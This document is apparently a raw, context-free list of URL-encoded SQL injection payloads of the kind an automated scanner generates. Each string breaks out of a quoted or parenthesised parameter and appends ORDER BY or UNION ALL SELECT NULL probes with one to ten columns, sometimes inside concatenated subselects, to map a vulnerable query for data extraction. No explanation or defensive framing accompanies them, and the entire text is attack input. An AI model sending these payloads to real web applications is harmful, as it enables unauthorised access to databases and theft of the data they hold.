1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22WioR%22%3D%22WioR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22GTyi%22%3D%22GTyi 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22plAZ%22%3D%22plAZ 1%22%29%20ORDER%20BY%201%23%20AND%20%28%22WpHw%22%20LIKE%20%22WpHw 1%22%29%20ORDER%20BY%209697%23%20AND%20%28%22Ogqa%22%20LIKE%20%22Ogqa 1%22%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28%22KBzs%22%20LIKE%20%22KBzs 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%28%22rWJd%22%20LIKE%20%22rWJd 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Jgfq%22%20LIKE%20%22Jgfq 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22gEfw%22%20LIKE%20%22gEfw 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22DKwY%22%20LIKE%20%22DKwY 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22capB%22%20LIKE%20%22capB 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22WoOL%22%20LIKE%20%22WoOL 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qxnw%22%20LIKE%20%22qxnw 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Tptg%22%20LIKE%20%22Tptg 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22PZDW%22%20LIKE%20%22PZDW 1%22%29%29%20ORDER%20BY%201%23%20AND%20%28%28%22yglL%22%20LIKE%20%22yglL 1%22%29%29%20ORDER%20BY%205445%23%20AND%20%28%28%22chcJ%22%20LIKE%20%22chcJ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28%28%22TRwV%22%20LIKE%20%22TRwV 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%28%28%22wYNr%22%20LIKE%20%22wYNr 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22vRjs%22%20LIKE%20%22vRjs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ENFN%22%20LIKE%20%22ENFN 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22bcyo%22%20LIKE%20%22bcyo 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Zejm%22%20LIKE%20%22Zejm 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22xRzx%22%20LIKE%20%22xRzx 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ECSk%22%20LIKE%20%22ECSk 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22BReG%22%20LIKE%20%22BReG 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22bkDq%22%20LIKE%20%22bkDq 1%22%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%22mbBt%22%20LIKE%20%22mbBt 1%22%29%29%29%20ORDER%20BY%205045%23%20AND%20%28%28%28%22mCfa%22%20LIKE%20%22mCfa 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28%28%28%22lKKt%22%20LIKE%20%22lKKt 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%28%28%28%22OAie%22%20LIKE%20%22OAie 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22HjYh%22%20LIKE%20%22HjYh 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22BAzJ%22%20LIKE%20%22BAzJ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22mHwZ%22%20LIKE%20%22mHwZ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22FVCy%22%20LIKE%20%22FVCy 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22LMou%22%20LIKE%20%22LMou 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22wmFE%22%20LIKE%20%22wmFE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22uvbw%22%20LIKE%20%22uvbw 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22QYiV%22%20LIKE%20%22QYiV 1%22%20ORDER%20BY%201%23%20AND%20%22SJHz%22%20LIKE%20%22SJHz 1%22%20ORDER%20BY%206385%23%20AND%20%22kLeX%22%20LIKE%20%22kLeX 1%22%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%22Ooxz%22%20LIKE%20%22Ooxz 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%22Tsbr%22%20LIKE%20%22Tsbr 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22IsUe%22%20LIKE%20%22IsUe 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22srEo%22%20LIKE%20%22srEo 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22LmKj%22%20LIKE%20%22LmKj 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22kOul%22%20LIKE%20%22kOul 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22AAwC%22%20LIKE%20%22AAwC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22xHBC%22%20LIKE%20%22xHBC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22VVpQ%22%20LIKE%20%22VVpQ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22yxWF%22%20LIKE%20%22yxWF 1%29%20WHERE%209869%3D9869%20ORDER%20BY%201%23 1%29%20WHERE%207257%3D7257%20ORDER%20BY%202801%23 1%29%20WHERE%207897%3D7897%20UNION%20ALL%20SELECT%20NULL%23 1%29%20WHERE%206663%3D6663%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%29%20WHERE%209336%3D9336%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%201989%3D1989%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%204043%3D4043%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207954%3D7954%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%203227%3D3227%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%204208%3D4208%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%204210%3D4210%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%208384%3D8384%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%203487%3D3487%20ORDER%20BY%201%23 1%27%29%20WHERE%201846%3D1846%20ORDER%20BY%204304%23 1%27%29%20WHERE%209809%3D9809%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%20WHERE%207020%3D7020%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%27%29%20WHERE%202307%3D2307%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209682%3D9682%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209014%3D9014%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%208388%3D8388%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%201321%3D1321%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%204351%3D4351%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%205806%3D5806%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%207281%3D7281%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%208939%3D8939%20ORDER%20BY%201%23 1%27%20WHERE%203761%3D3761%20ORDER%20BY%209555%23 1%27%20WHERE%203358%3D3358%20UNION%20ALL%20SELECT%20NULL%23 1%27%20WHERE%208334%3D8334%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%27%20WHERE%203631%3D3631%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%202579%3D2579%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%203414%3D3414%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%209031%3D9031%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%206918%3D6918%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%203262%3D3262%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%206555%3D6555%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%202385%3D2385%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%209749%3D9749%20ORDER%20BY%201%23 1%22%20WHERE%204864%3D4864%20ORDER%20BY%207867%23 1%22%20WHERE%207889%3D7889%20UNION%20ALL%20SELECT%20NULL%23 1%22%20WHERE%202326%3D2326%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%22%20WHERE%207619%3D7619%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%203406%3D3406%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%205197%3D5197%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%204186%3D4186%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%205022%3D5022%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%202261%3D2261%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%207055%3D7055%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%203078%3D3078%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20%7C%7C%20%28SELECT%203466%20FROM%20DUAL%20WHERE%203933%3D3933%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201852%20FROM%20DUAL%20WHERE%209545%3D9545%20ORDER%20BY%204923%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208832%20FROM%20DUAL%20WHERE%207938%3D7938%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208280%20FROM%20DUAL%20WHERE%206051%3D6051%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201191%20FROM%20DUAL%20WHERE%203730%3D3730%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202410%20FROM%20DUAL%20WHERE%206088%3D6088%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204329%20FROM%20DUAL%20WHERE%207156%3D7156%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203330%20FROM%20DUAL%20WHERE%201666%3D1666%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202260%20FROM%20DUAL%20WHERE%202946%3D2946%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202110%20FROM%20DUAL%20WHERE%209371%3D9371%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207232%20FROM%20DUAL%20WHERE%207124%3D7124%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203599%20FROM%20DUAL%20WHERE%208648%3D8648%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206730%20WHERE%205231%3D5231%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205762%20WHERE%206355%3D6355%20ORDER%20BY%203663%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204124%20WHERE%202399%3D2399%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202664%20WHERE%202749%3D2749%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202565%20WHERE%206915%3D6915%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205541%20WHERE%203954%3D3954%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204749%20WHERE%201876%3D1876%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201984%20WHERE%203348%3D3348%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208978%20WHERE%206278%3D6278%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208160%20WHERE%209679%3D9679%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202893%20WHERE%201646%3D1646%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209447%20WHERE%202300%3D2300%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%207618%20FROM%20DUAL%20WHERE%207777%3D7777%20ORDER%20BY%201%23%20%29 1%20%2B%20%28SELECT%207034%20FROM%20DUAL%20WHERE%204297%3D4297%20ORDER%20BY%204621%23%20%29 1%20%2B%20%28SELECT%201931%20FROM%20DUAL%20WHERE%201947%3D1947%20UNION%20ALL%20SELECT%20NULL%23%20%29 1%20%2B%20%28SELECT%206447%20FROM%20DUAL%20WHERE%208488%3D8488%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201488%20FROM%20DUAL%20WHERE%208120%3D8120%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205463%20FROM%20DUAL%20WHERE%201529%3D1529%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208760%20FROM%20DUAL%20WHERE%207948%3D7948%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204947%20FROM%20DUAL%20WHERE%203896%3D3896%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201765%20FROM%20DUAL%20WHERE%207340%3D7340%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205719%20FROM%20DUAL%20WHERE%204401%3D4401%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208238%20FROM%20DUAL%20WHERE%209167%3D9167%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204642%20FROM%20DUAL%20WHERE%209275%3D9275%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%202700%20WHERE%203374%3D3374%20ORDER%20BY%201%23%20%29 1%20%2B%20%28SELECT%202279%20WHERE%203426%3D3426%20ORDER%20BY%205749%23%20%29 1%20%2B%20%28SELECT%202312%20WHERE%205404%3D5404%20UNION%20ALL%20SELECT%20NULL%23%20%29 1%20%2B%20%28SELECT%202784%20WHERE%208655%3D8655%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201487%20WHERE%209314%3D9314%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205672%20WHERE%209709%3D9709%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208629%20WHERE%206370%3D6370%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209395%20WHERE%201082%3D1082%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206646%20WHERE%202744%3D2744%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207364%20WHERE%201102%3D1102%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203008%20WHERE%208508%3D8508%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209344%20WHERE%204265%3D4265%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%27%20%2B%20%28SELECT%20%27WqTs%27%20FROM%20DUAL%20WHERE%205655%3D5655%20ORDER%20BY%201%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Gozv%27%20FROM%20DUAL%20WHERE%203040%3D3040%20ORDER%20BY%208116%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27FKQc%27%20FROM%20DUAL%20WHERE%204980%3D4980%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27qIVa%27%20FROM%20DUAL%20WHERE%208614%3D8614%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27LljR%27%20FROM%20DUAL%20WHERE%204722%3D4722%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27otEm%27%20FROM%20DUAL%20WHERE%205668%3D5668%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27sHeR%27%20FROM%20DUAL%20WHERE%203163%3D3163%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27HKpB%27%20FROM%20DUAL%20WHERE%205159%3D5159%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27tKZS%27%20FROM%20DUAL%20WHERE%209842%3D9842%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27CKxz%27%20FROM%20DUAL%20WHERE%209657%3D9657%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mzbg%27%20FROM%20DUAL%20WHERE%204141%3D4141%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27LthJ%27%20FROM%20DUAL%20WHERE%201678%3D1678%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27PXfw%27%20WHERE%206216%3D6216%20ORDER%20BY%201%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Asmy%27%20WHERE%208248%3D8248%20ORDER%20BY%203357%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vitf%27%20WHERE%209344%3D9344%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27JiEW%27%20WHERE%209889%3D9889%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27wTnA%27%20WHERE%203343%3D3343%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27SjNl%27%20WHERE%205292%3D5292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jIpH%27%20WHERE%203246%3D3246%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mkTa%27%20WHERE%201110%3D1110%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 